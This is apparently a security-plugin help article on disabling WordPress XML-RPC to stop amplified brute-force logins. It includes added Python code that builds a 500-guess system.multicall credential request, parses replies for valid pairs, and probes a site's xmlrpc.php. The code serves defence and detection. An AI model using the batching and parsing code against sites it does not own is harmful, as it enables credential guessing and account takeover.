How to automatically block XML-RPC brute force amplification attacks against WordPress

XML-RPC is enabled by default in WordPress because it lets web and mobile applications connect to your WordPress site and operate it remotely.

However, because of its power, XML-RPC can also significantly amplify brute-force login attacks.

What does "amplified brute-force attack" mean?

It means that instead of trying thousands of username and password combinations one at a time through the login page, attackers can use the XML-RPC protocol together with the system.multicall method, which lets them:

  • Go undetected by ordinary brute-force mitigation, which counts requests to the login page rather than the many login attempts bundled inside a single XML-RPC request
  • Try hundreds of thousands of username and password combinations with only a few XML-RPC requests, since each request can carry many calls.
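To make the amplification concrete, the following added example (it is not code from this article or from Shield) builds one system.multicall request that bundles 500 wp.getUsersBlogs calls, each a username/password check, reads the reply the way an attacker would, and shows the number a detection rule has to look at: login attempts per request rather than HTTP requests. The credential list and the server replies are constructed sample data and nothing is sent over the network. One caveat worth knowing: current WordPress core stops evaluating further login attempts inside the same request after the first failure, so against an up-to-date core the reply is a batch of identical faults whether or not a guess was right; the request-volume amplification that slips past per-request rate limiting is unaffected, and the simulated reply below is that of a server that evaluates every bundled call.

```python
"""Added example (not code from the original article or from Shield).

One HTTP POST to xmlrpc.php can carry hundreds of wp.getUsersBlogs calls, each a
username/password check, wrapped in system.multicall. The attacker-side helpers
build the request and read the reply; the detection-side helper counts attempts
per request. All credentials and replies are constructed sample data.
"""
import xmlrpc.client

# Constructed sample guesses: 500 candidate passwords for one account.
SAMPLE_CREDENTIALS = [("admin", f"Summer{i:03d}!") for i in range(500)]


def build_multicall_probe(credentials):
    """Attacker side: one request body bundling a wp.getUsersBlogs call per
    credential pair. wp.getUsersBlogs takes exactly (username, password), so
    each element's result-or-fault answers "was this pair valid?"."""
    calls = [
        {"methodName": "wp.getUsersBlogs", "params": [user, password]}
        for user, password in credentials
    ]
    # dumps() takes the positional params as a tuple: one param, the array of calls.
    return xmlrpc.client.dumps((calls,), methodname="system.multicall")


def count_login_attempts(request_body):
    """Detection side: how many authentication attempts does ONE request carry?
    A direct call to a WordPress method counts as 1; system.multicall counts
    every bundled call that is not itself a system.* introspection method."""
    params, methodname = xmlrpc.client.loads(request_body)
    if methodname is None:  # a response body, not a request
        return 0
    if methodname != "system.multicall":
        return 0 if methodname.startswith("system.") else 1
    return sum(
        1 for call in params[0]
        if not call.get("methodName", "").startswith("system.")
    )


def simulated_response(credentials, valid=None):
    """Constructed stand-in for the reply of a server that evaluates every call,
    in the shape WordPress's system.multicall uses: per call, either a
    one-element array holding the method result (login worked) or a struct with
    faultCode/faultString (login failed; 403 text modelled on WordPress core)."""
    results = []
    for pair in credentials:
        if pair == valid:
            results.append([[{"blogid": "1", "blogName": "Example", "isAdmin": True}]])
        else:
            results.append({"faultCode": 403, "faultString": "Incorrect username or password."})
    return xmlrpc.client.dumps((results,), methodresponse=True)


def successful_pairs(response_body, credentials):
    """Attacker side: pick out the credential pairs whose call returned a result
    instead of a fault; one response answers every guess in the batch."""
    (results,), _ = xmlrpc.client.loads(response_body)
    return [
        pair for pair, result in zip(credentials, results)
        if not (isinstance(result, dict) and "faultCode" in result)
    ]


if __name__ == "__main__":
    body = build_multicall_probe(SAMPLE_CREDENTIALS)
    print(f"one POST of {len(body)} bytes carries {count_login_attempts(body)} login attempts")
    reply = simulated_response(SAMPLE_CREDENTIALS, valid=("admin", "Summer137!"))
    print("pairs that returned a result:", successful_pairs(reply, SAMPLE_CREDENTIALS))
```

The detection helper is the point for defenders: a rule that counts POSTs to xmlrpc.php sees one request here, while a rule that parses the body and counts bundled non-system.* calls sees 500 login attempts and can rate-limit or block on that number.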

Recommendation: If you don’t use XML-RPC at all, the best thing you can do is disable it.

How to block brute force login attacks over XML-RPC

You can have Shield help you with this. Go to the Lockdown module > API & XML-RPC and enable the "Disable The XML-RPC System" option.

Your site is now protected against brute-force login attacks carried out over XML-RPC.

Hint: To check and confirm that XML-RPC functionality is disabled, you can:

  1. Go to: http://xmlrpc.eritreo.it/
  2. Enter your WordPress site URL in the ‘Address’ field
  3. Click the ‘Check’ button.

You should receive a response page explaining that your site’s XML-RPC server isn’t available.

Note: The message "XML-RPC server accepts POST requests only." is output well before any XML-RPC processing actually occurs, so seeing it when you open xmlrpc.php in a browser (which sends a GET request) proves nothing about whether XML-RPC is disabled. If you send a POST request (the request type the message says is supported), you’ll get an entirely different response, one that indicates the XML-RPC system is disabled.
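The check above can be scripted, and doing so makes the note concrete: only a POST that reaches the XML-RPC code gives a real answer. The following added example is not from this article or from Shield. It assumes the default endpoint path /xmlrpc.php, sends an authenticating call (wp.getUsersBlogs with throwaway credentials) so that the server's login code path is exercised rather than a harmless method that may answer even when logins are blocked, and its sample response bodies are constructed, with the "disabled" fault text modelled on WordPress core's own wording. Shield's exact wording may differ, so the classifier keys on a fault mentioning "disabled" rather than on an exact string.

```python
"""Added example (not from the original article or from Shield): script the
"is XML-RPC really off?" check with a POST instead of trusting the GET text.

Assumptions: endpoint is <site>/xmlrpc.php (WordPress default); sample bodies
are constructed, with the "disabled" fault modelled on WordPress core's wording;
Shield's exact text may differ, so the classifier keys on the word "disabled".
"""
import sys
import urllib.error
import urllib.request
import xmlrpc.client

GET_ONLY_MESSAGE = "XML-RPC server accepts POST requests only."

# Throwaway credentials: forces the server through its login code path.
PROBE_BODY = xmlrpc.client.dumps(("nobody", "not-a-real-password"), methodname="wp.getUsersBlogs")

# Constructed sample response bodies (not captured from a real site).
SAMPLE_GET_BODY = GET_ONLY_MESSAGE
SAMPLE_ENABLED_BODY = xmlrpc.client.dumps(
    xmlrpc.client.Fault(403, "Incorrect username or password."), methodresponse=True)
SAMPLE_DISABLED_BODY = xmlrpc.client.dumps(
    xmlrpc.client.Fault(405, "XML-RPC services are disabled on this site."), methodresponse=True)
SAMPLE_HTML_BODY = "<html><body><h1>403 Forbidden</h1></body></html>"


def classify(body):
    """Return (verdict, detail) for an xmlrpc.php response body."""
    if GET_ONLY_MESSAGE in body:
        return ("inconclusive", "that text is printed before any XML-RPC processing; POST instead")
    try:
        params, _ = xmlrpc.client.loads(body)
    except xmlrpc.client.Fault as fault:
        if "disabled" in fault.faultString.lower():
            return ("disabled", f"fault {fault.faultCode}: {fault.faultString}")
        if fault.faultCode == 403:
            # The password was actually checked, so XML-RPC logins are live.
            return ("enabled", f"login evaluated, fault {fault.faultCode}: {fault.faultString}")
        return ("fault", f"fault {fault.faultCode}: {fault.faultString}")
    except Exception:
        return ("unknown", "not an XML-RPC response (HTML error page, WAF block page, ...)")
    return ("enabled", f"method ran and returned {params[0]!r}")


def probe(site_url, timeout=10):
    """POST the authenticating probe to <site>/xmlrpc.php and classify the reply."""
    endpoint = site_url.rstrip("/") + "/xmlrpc.php"  # assumed default path
    request = urllib.request.Request(
        endpoint, data=PROBE_BODY.encode("utf-8"),
        headers={"Content-Type": "text/xml"}, method="POST")
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            text = response.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        text = err.read().decode("utf-8", "replace")  # 4xx/5xx replies still carry a body
    return classify(text)


if __name__ == "__main__":
    if len(sys.argv) == 2:
        print(*probe(sys.argv[1]))  # e.g. python check_xmlrpc.py https://example.com
    else:  # offline demonstration with the constructed bodies
        for name, body in [("GET", SAMPLE_GET_BODY), ("enabled", SAMPLE_ENABLED_BODY),
                           ("disabled", SAMPLE_DISABLED_BODY), ("html", SAMPLE_HTML_BODY)]:
            print(name, *classify(body))
```

Run it only against your own site: the probe is one deliberately failed login, which a brute-force protection that is still active will count as such. A "fault" verdict with unfamiliar text means the endpoint ran but answered with something neither core's disabled message nor a credential check; read the detail before deciding.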

What are the implications of disabling the WordPress XML-RPC system?

You should be aware of what may be affected by disabling the XML-RPC system on your WordPress site:

  • Certain Jetpack plugin functionality will be impacted
  • The WordPress mobile apps for Android/iOS will stop working with your site, since they communicate over the XML-RPC system
  • Any other system or plugin that uses your site’s XML-RPC system to communicate with and operate your site will stop working.

Note: There is an option to allow login through XML-RPC that bypasses the account management rules. It is offered for users who need to remain compatible with other services (as outlined above).

To learn more about WordPress XML-RPC, and why and how to block attacks, read this blog article here.